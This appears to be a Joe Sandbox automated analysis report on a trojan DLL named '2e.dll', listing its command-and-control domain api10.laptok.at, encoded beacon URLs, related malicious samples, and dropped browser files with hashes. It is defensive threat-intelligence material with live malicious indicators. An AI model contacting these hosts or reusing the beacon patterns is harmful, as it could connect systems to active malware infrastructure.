Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api10.laptok.at	87.106.18.141	true	true	14%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l	true	Avira URL Cloud: safe	unknown
http://api10.laptok.at/favicon.ico	true	Avira URL Cloud: safe	unknown
http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	2e.dll	false	URL Reputation: safe	unknown
http://www.nytimes.com/	msapplication.xml3.15.dr	false		high
http://ocsp.sectigo.com0	2e.dll	false	URL Reputation: safe	unknown
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5a	{DD28BAED-2779-11EC-90EB-ECF4BBEA1588}.dat.21.dr, ~DFB9EDA9C4DE41A518.TMP.21.dr	true	Avira URL Cloud: safe	unknown
http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tX	{C2243AEB-2779-11EC-90EB-ECF4BBEA1588}.dat.15.dr	true	Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	2e.dll	false	URL Reputation: safe	unknown
http://www.youtube.com/	msapplication.xml7.15.dr	false		high
https://sectigo.com/CPS0D	2e.dll	false	URL Reputation: safe	unknown
http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1P	loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.wikipedia.com/	msapplication.xml6.15.dr	false	URL Reputation: safe	unknown
http://www.amazon.com/	msapplication.xml.15.dr	false		high
http://www.live.com/	msapplication.xml2.15.dr	false		high
http://www.reddit.com/	msapplication.xml4.15.dr	false		high
http://www.twitter.com/	msapplication.xml5.15.dr	false		high
http://www.google.com/	msapplication.xml1.15.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
87.106.18.141	api10.laptok.at	Germany		8560	ONEANDONE-ASBrauerstrasse48DE	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	498882
Start date:	07.10.2021
Start time:	16:18:46
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	2e.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	24
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.winDLL@11/19@2/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 41% (good quality ratio 39.7%) Quality average: 80% Quality standard deviation: 27.2%
HCA Information:	Successful, ratio: 71% Number of executed functions: 35 Number of non-executed functions: 33
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 95.100.218.79, 20.82.210.154, 20.54.110.249, 2.20.178.10, 2.20.178.56, 40.112.88.60, 104.94.89.6, 2.20.178.33, 2.20.178.24, 152.199.19.161 Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, e12564.dspb.akamaiedge.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, go.microsoft.com.edgekey.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
87.106.18.141	a3.exe	Get hash	malicious	Browse	api5.feen007.at/favicon.ico
	a04.dll	Get hash	malicious	Browse	app10.laptok.at/favicon.ico
	50.dll	Get hash	malicious	Browse	api10.laptok.at/favicon.ico
	08dVB7v4wB6w.vbs	Get hash	malicious	Browse	chat.allager.at/jvassets/xI/t64.dat
	http://far.gaploop.at/api1/m9Nm6sQ5MZ2/kV1dHuUchwgj0p/w9B514uuWuNRu_2Fovw1B/iJjn_2FjOcMhSdO6/hY1viFbhIYH_2BS/FrMYbmCHgkAwm_2Btu/e29igvEBi/gLOHtqdBI_2B3sibC3Cg/z_2F8IFoCH_2BWJVdUY/ri7hwzyuAx2q5RHXJmbXhc/ygopWPWJKwti5/IOOS1u46/4ZXFc4Ok4SPekiO7ot2QyT_/2FJdMyYfAP/7FTqw0rQZL_2B1pan/wh8ruTp3dham/UlLIzAZ_2Fn/esHGZHp93qljV_/0A_0DvFEgD08oveRu1RDL/3nPBhZLduxccr2_2/FS5iRLSxGBo44/0xUc	Get hash	malicious	Browse	far.gaploop.at/api1/m9Nm6sQ5MZ2/kV1dHuUchwgj0p/favicon.ico
	4EyIHmLYEBBs.vbs	Get hash	malicious	Browse	chat.allager.at/jvassets/xI/t64.dat

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
api10.laptok.at	50.dll	Get hash	malicious	Browse	87.106.18.141
	11.dll	Get hash	malicious	Browse	35.228.184.80
	documentation_27396.vbs	Get hash	malicious	Browse	35.189.93.117
	info_70397.vbs	Get hash	malicious	Browse	35.189.93.117
	SecuriteInfo.com.Win32.Kryptik.HJSQ.12709.dll	Get hash	malicious	Browse	35.189.93.117
	SecuriteInfo.com.Trojan.Win32.Save.a.30469.dll	Get hash	malicious	Browse	35.189.93.117
	22.dll	Get hash	malicious	Browse	34.65.108.95
	2200.dll	Get hash	malicious	Browse	34.65.108.95
	urban.dll	Get hash	malicious	Browse	34.65.25.23
	SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll	Get hash	malicious	Browse	34.65.15.6
	SecuriteInfo.com.Generic.mg.3964ec2fe493ed56.dll	Get hash	malicious	Browse	34.65.144.159
	SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll	Get hash	malicious	Browse	34.65.144.159
	SecuriteInfo.com.Generic.mg.f77e7bd43f365593.dll	Get hash	malicious	Browse	34.65.144.159
	NJPcHPuRcG.dll	Get hash	malicious	Browse	34.65.144.159
	Ne6A4k8vK6.dll	Get hash	malicious	Browse	34.65.144.159
	File_78476.xlsb	Get hash	malicious	Browse	35.228.31.40
	u8xtCk7fq8.dll	Get hash	malicious	Browse	35.228.31.40
	2200.dll	Get hash	malicious	Browse	35.228.31.40
	SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll	Get hash	malicious	Browse	35.228.31.40
	Attached_File_898318.xlsb	Get hash	malicious	Browse	35.228.31.40

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ONEANDONE-ASBrauerstrasse48DE	a3.exe	Get hash	malicious	Browse	87.106.18.141
	a04.dll	Get hash	malicious	Browse	87.106.18.141
	50.dll	Get hash	malicious	Browse	87.106.18.141
	Quote -0071021.exe	Get hash	malicious	Browse	217.160.0.7
	DHL SHIPMENT.HTML	Get hash	malicious	Browse	217.160.0.196
	hwIILTIn0n.exe	Get hash	malicious	Browse	217.160.0.17
	just.exe	Get hash	malicious	Browse	212.227.15.158
	2WK7SGkGVZ.exe	Get hash	malicious	Browse	74.208.236.156
	0n1pEFuGKC.exe	Get hash	malicious	Browse	74.208.236.145
	VmbABLKNbD.exe	Get hash	malicious	Browse	74.208.236.108
	Update-KB250-x86.exe	Get hash	malicious	Browse	74.208.5.20
	Update-KB2984-x86.exe	Get hash	malicious	Browse	74.208.5.20
	justifi4c.exe	Get hash	malicious	Browse	213.165.67.118
	CY2075400.exe	Get hash	malicious	Browse	213.165.67.115
	Justificante de la transfer.exe	Get hash	malicious	Browse	212.227.15.142
	IMAGE1001.exe	Get hash	malicious	Browse	213.165.67.115
	Exq3dXFDHe.exe	Get hash	malicious	Browse	217.160.0.243
	MIN8gr0eOj.exe	Get hash	malicious	Browse	74.208.236.228
	solicitud de presupuesto.exe	Get hash	malicious	Browse	217.160.0.21
	Payment Requisition October 4.xlsx	Get hash	malicious	Browse	74.208.236.226

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{C2243AE9-2779-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7694526431217736
Encrypted:	false
SSDEEP:	48:Iw/Gcpr2GwpLuG/ap8fGIpcMGvnZpvoGobPqp9oGo4fhzpmLGWb5nTpUGWb7T6p7:rVZuZM2hWVtqif7fhzMZZ66stBXapB
MD5:	5F38D3B6CD6DCB6133FA4568E8AFA2C1
SHA1:	40AF099DED37781639FB476F50B7FA65474684F8
SHA-256:	EDA9AA7EFFFAFA29ED90217E21192761860F29B9C58D06A282F84FF25E364D81
SHA-512:	DCE00F5DFEE4685E46E7279E46534B706D039A57F70ED6C8D0516EBA3C25261AB3AE805E6D0CE90C2064FC6B7FC68F063B24632DEFEDDF418206B913BE879279
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{DD28BAEB-2779-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7698468890647774
Encrypted:	false
SSDEEP:	96:rLZIZp29WctMxifH4x2xzMLxOxbx65xSxB0xbxpB:rLZIZp29WctoifHkmzMleV6/yBwVpB
MD5:	4E3474B49787A29BDCA2DF6CE06599A9
SHA1:	85F0E57BB0A9F59BB65E8992F13EE3A672A10B30
SHA-256:	AEE2DF902E7ACEC926E03297FD67BA8762CCBCA7A6E81A28B23F240D8E6E9351
SHA-512:	B5D212E7789BC193D358E2E27100AA4294FAAF8263F3DC4AA539FC052D4F5E7B8D7A24A706C33E7F4B32B55533F9E93E72C4DC50DB01CAAD3C9CF03C65C40045
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{C2243AEB-2779-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28168
Entropy (8bit):	1.924630739251775
Encrypted:	false
SSDEEP:	96:reZxQe6oBSppHjN2NW2M6B9Zaq5AXX2l9TMZaq5AX6A:reZxQe6okppHjN2NW2M6BmqK2l7qKKA
MD5:	76B2F71618816F746BE6A756E61D9574
SHA1:	298CE55345D46FE76B74C3836C619BA98579BCCC
SHA-256:	12D79A99EA47B29192AE132004E1470A34B757EA63D7FF7F9C1720739D5B3F92
SHA-512:	7BFB42F2DCB48FAD6D7EE357759E1B97648C726CB52E01726B437EDF22EB83EBFEE54742C9E9CD0FA3C92F242652879412373F860E7C382254EFB45F6CCEAF12
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{DD28BAED-2779-11EC-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28128
Entropy (8bit):	1.9149036050589494
Encrypted:	false
SSDEEP:	96:rHZsQ06qBSJjN2mWLMLpfYKkgm/SVYK7Kkgm/HA:rHZsQ06qkJjN2mWLMLpfYxaVY+xfA
MD5:	B0E31D8A8F80E5107F50E167D5F64CE3
SHA1:	B0F568C02F3B875C2B009C74F82E138F0495E4EB
SHA-256:	31C9F99F030865BFF0AFA9D658003A6E0FEDB2763C8C69BC23C7B66B549EABA8
SHA-512:	0E42904AC4580536C9B1630693AB4DA87A284791AF546C4E5AB73CD4CA22B65F069A84437DCE7A866A3FC80253F3ACAFE352E0DF364C1AA81C59F77BB18D5766
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.116265607751289
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEiUzUzCnWimI002EtM3MHdNMNxOEiUzUzCnWimI00OYGVbkEtMb:2d6NxOY42SZHKd6NxOY42SZ7YLb
MD5:	B9289B02F73BA2696CE382F25B252768
SHA1:	34866CE7763DD1439472F01A062BAF1DE35AB40C
SHA-256:	02DCEC0FD7F8268958B6D9D1E629E45AF6E498A20E23BBF3961F8FA57936A67F
SHA-512:	4A45B4EACD678F305CCA348D948A363DDA19067A69ED083546F34660CEE816D16A282FD16D443C56B3BA01E0FC0896CB96D3CE6B37F79B70F309F8525B3A4B47
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.147158389776371
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kCOsCnWimI002EtM3MHdNMNxe2kCOsCnWimI00OYGkak6EtMb:2d6NxrYSZHKd6NxrYSZ7Yza7b
MD5:	0E2824AEBA5263BDBEB6F6C1B697201D
SHA1:	249FBF817F78E7030D4B51FF1C2D596003F7B022
SHA-256:	EF74B42C008153CAFE31A10A9B1518ECE461BB8BF3D605C275494097EF10048A
SHA-512:	E87F7261B11064B1A71AA98D4E9A69F97B5A86EEFA88A6B7A737BEA763C6A2691188E4AACEF19AFBD3F2158953F3906F2189F59D01F2FB4F753C7B84A0B07BB6
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.136384701855738
Encrypted:	false
SSDEEP:	12:TMHdNMNxvLiUzUzCnWimI002EtM3MHdNMNxvLiUzUzCnWimI00OYGmZEtMb:2d6NxvL42SZHKd6NxvL42SZ7Yjb
MD5:	D6293B418E61C0E16419449C7AEC6137
SHA1:	CDE20431F39715389797994CD61049E6FBE3A812
SHA-256:	60DE51742FA97CEBA37658D67BFE11E8B1A4B2E4724BAA33427799ACB59CA0C2
SHA-512:	E4789D2CBF3925E4A89D4971446CF2D9C8023DEBFB6AA50EA1B7E85F8FA120A765593665D3DFBE2816DBFE4DE4D3C0534F52F09325E24498134F36E8ABF39CD2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.135109105672943
Encrypted:	false
SSDEEP:	12:TMHdNMNxiCOsCnWimI002EtM3MHdNMNxiCOsCnWimI00OYGd5EtMb:2d6NxeSZHKd6NxeSZ7YEjb
MD5:	2FD98F3ADDA3603CF1D1F96647FA06CA
SHA1:	4CC088DFA5CA39E3A41FA12080CAF29D9C809506
SHA-256:	D6EF9422DFD69F0913DA2E7245F967B8577CA90D71E5F9ADE29B62531EAC4833
SHA-512:	12050C0FBA5A7134104DC4EC634E29A8085D5FA401FDB22A649C25E863568CDB17E787390263B521D5E1FF5E70C8D9B4A8ABF5C1BF9BAA4FAE350727A1EF4E86
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.142854959846915
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGwiUzUzCnWimI002EtM3MHdNMNxhGwiUzUzCnWimI00OYG8K075EtMb:2d6NxQE42SZHKd6NxQE42SZ7YrKajb
MD5:	8D563F07516320E95AE089BBC291A6EB
SHA1:	22E510ABFCDC78066565F209B5D9E3BC7C7B64FB
SHA-256:	70549C4B108CAED8AAC5664A94774E3B2B9204B65EB0C214A62D743B35E915F3
SHA-512:	03BAD30FA86E3C97DDE165CD7FF5E7AC23D8D75FC77DE706E84EB12CADD2A9CCE1FC838BE6C3875EDC5D0E211E3795D30A098449FC84C8D1CF55F561B328865F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.12013045220898
Encrypted:	false
SSDEEP:	12:TMHdNMNx0niUzUzCnWimI002EtM3MHdNMNx0niUzUzCnWimI00OYGxEtMb:2d6Nx0342SZHKd6Nx0342SZ7Ygb
MD5:	5797054F1BF80218E67B8EB13BA79DCC
SHA1:	117B6C85528CB5FDED08DC064E3C34B5FC0F027A
SHA-256:	AB40749924948AFD3098C35DA1B5DA3965D24B16ED2A5BE721E0FDE3943424D8
SHA-512:	A3B9E863A17DB97FE8E29C4955CC42B0B47835C5BE86F9E31A796725CE2773B78C34EB2912634A39D87940B5580E424050C953DA697984F7C42F89956BEBBD47
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.158929528907078
Encrypted:	false
SSDEEP:	12:TMHdNMNxxCOsCnWimI002EtM3MHdNMNxxCOsCnWimI00OYG6Kq5EtMb:2d6NxPSZHKd6NxPSZ7Yhb
MD5:	DDEEB8CBF6C19764CC86C0C33580C3CD
SHA1:	84D9A085AD938C9692A7717DCFCDFF116D01B047
SHA-256:	02EC86E92A9BCE56B88199A7971994C681973BFA4FEDBEF43ECF2EBFD09C7B60
SHA-512:	4D628D541CA0C8AA53F4F052F565FFB1CB7BE09D3A007F207E13A8ED7A54B7787F5B410D144B6E7F6E1382A8B25D7F7C13DC49F30EC9F74C5DAFA84034EFFE72
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.129267751681902
Encrypted:	false
SSDEEP:	12:TMHdNMNxcCOsCnWimI002EtM3MHdNMNxcCOsCnWimI00OYGVEtMb:2d6NxASZHKd6NxASZ7Ykb
MD5:	9D5AC7B16558A6CC28492AC28E1454F3
SHA1:	05928854C329AA44A0871B6A88BEFB7BF57177D6
SHA-256:	A7215397C2A465C7AE54EFBCA71E60373B5C31074B2700BF490D93227D02BE95
SHA-512:	EBCCCA5DBAD89FA75EAF1791B2E4243EEB7F29812A5B73DF8E10664CEEC6BF43392DADD531FD3EA5D9E7468A79FBE18767F6C9E5ADC7D5E6939B8D7F034760BD
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin8215062560\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.1202160243666865
Encrypted:	false
SSDEEP:	12:TMHdNMNxfnCOsCnWimI002EtM3MHdNMNxfnCOsCnWimI00OYGe5EtMb:2d6Nx9SZHKd6Nx9SZ7YLjb
MD5:	10D82FAC8F0A69FB555E9811B2D0A6E3
SHA1:	CB719FACB674AC7851A920127EA1A4E8ADC3DB6D
SHA-256:	3606FA33CA1ED25B52554EE60670FE6BB14E4461ADCB76415E6C339A63F468F2
SHA-512:	C9CBBEB850EFDB0FE4AB85CD32C960A2191A5190CA31919FCB8F358BE3B79C9A7BFFF1AA55594476CBC44B2425C2247515B5BC4E76DA5B8E6F0D4DBF26D6722E
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
